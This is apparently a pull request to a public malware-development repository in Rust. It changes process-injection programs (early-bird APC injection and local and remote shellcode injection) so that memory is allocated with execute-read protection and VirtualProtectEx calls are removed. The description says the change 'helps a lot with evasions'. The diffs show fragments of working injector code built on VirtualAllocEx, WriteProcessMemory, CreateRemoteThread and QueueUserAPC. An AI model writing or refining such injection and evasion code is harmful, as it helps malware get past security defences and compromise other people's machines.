### PR TITLE
Correcting and adjusting some parts of the code

### DIFF
--- a/Process-Injection/early_bird_apc_injection.rs
+++ b/Process-Injection/early_bird_apc_injection.rs
@@ -9,8 +9,8 @@ use std::{ffi::CString, ptr::null_mut};
 use winapi::ctypes::c_void;
 use winapi::um::debugapi::DebugActiveProcessStop;
 use winapi::um::handleapi::CloseHandle;
-use winapi::um::memoryapi::{VirtualAllocEx, VirtualFreeEx, VirtualProtectEx, WriteProcessMemory};
-use winapi::um::winnt::{MEM_COMMIT, MEM_RELEASE, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE};
+use winapi::um::memoryapi::{VirtualAllocEx, VirtualFreeEx, WriteProcessMemory};
+use winapi::um::winnt::{MEM_COMMIT, MEM_RELEASE, MEM_RESERVE, PAGE_EXECUTE_READ};
 use winapi::um::{
     errhandlingapi::GetLastError, 
     processthreadsapi::{CreateProcessA, QueueUserAPC ,CreateRemoteThread, PROCESS_INFORMATION, STARTUPINFOA}, 
@@ -112,7 +112,7 @@ fn main(){
             null_mut(),
             buf.len(),
             MEM_COMMIT | MEM_RESERVE,
-            PAGE_READWRITE,
+            PAGE_EXECUTE_READ,
         );
 
         if address.is_null(){
@@ -130,20 +130,6 @@ fn main(){
         );
 
         okey!("Process_mem: {:#?}",process_mem);
-
-        let mut oldprotect:u32 = 0;
-
-        let virtual_protect = VirtualProtectEx(
-            hprocess,
-            address,
-            buf.len(),
-            PAGE_EXECUTE_READWRITE,
-            &mut oldprotect,
-        );
-        
-        if virtual_protect == 0{
-            error!("VirtualProtectEx failed : {:#?}",virtual_protect);
-        }
 
         // Creating an remote thread
 

--- a/Process-Injection/inject_on_localprocess.rs
+++ b/Process-Injection/inject_on_localprocess.rs
@@ -74,7 +74,7 @@ fn main(){
             null_mut(),
             buf.len(),
             0x1000,
-            0x40,
+            0x04, // PAGE_READWRITE
         );
 
         if exec.is_null(){

--- a/Process-Injection/inject_on_remoteprocess.rs
+++ b/Process-Injection/inject_on_remoteprocess.rs
@@ -5,7 +5,7 @@ For more codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
 */
 use std::ptr::null_mut;
 
-use winapi::{shared::minwindef::LPVOID, um::{errhandlingapi::GetLastError, handleapi::CloseHandle, memoryapi::{VirtualAllocEx, WriteProcessMemory}, processthreadsapi::{CreateRemoteThread, OpenProcess}, winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}}};
+use winapi::{shared::minwindef::LPVOID, um::{errhandlingapi::GetLastError, handleapi::CloseHandle, memoryapi::{VirtualAllocEx, WriteProcessMemory}, processthreadsapi::{CreateRemoteThread, OpenProcess}, winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ}}};
 
 macro_rules! okey{
     ($msg:expr, $($arg:expr), *) => {
@@ -82,7 +82,7 @@ fn main(){
             null_mut(),
             buf.len(),
             MEM_RESERVE | MEM_COMMIT,
-            PAGE_EXECUTE_READWRITE,
+            PAGE_EXECUTE_READ,
         );
 
         if remote_buffer.is_null(){


### PR DESCRIPTION
Hello, Whitecat18,

This pull request is intended to help you. I have set the variables passed to the VirtualAllocEx function to PAGE_EXECUTE_READ, as the WriteProcessMemory function can change the write permissions at the time of the call. Therefore, there is no need to invoke VirtualProtectEx, which already helps a lot with evasions.

Also, I made a second adjustment to PAGE_READWRITE because you were allocating memory with PAGE_EXECUTE_READWRITE and then calling VirtualProtectEx to apply the same protection as before, which was not necessary.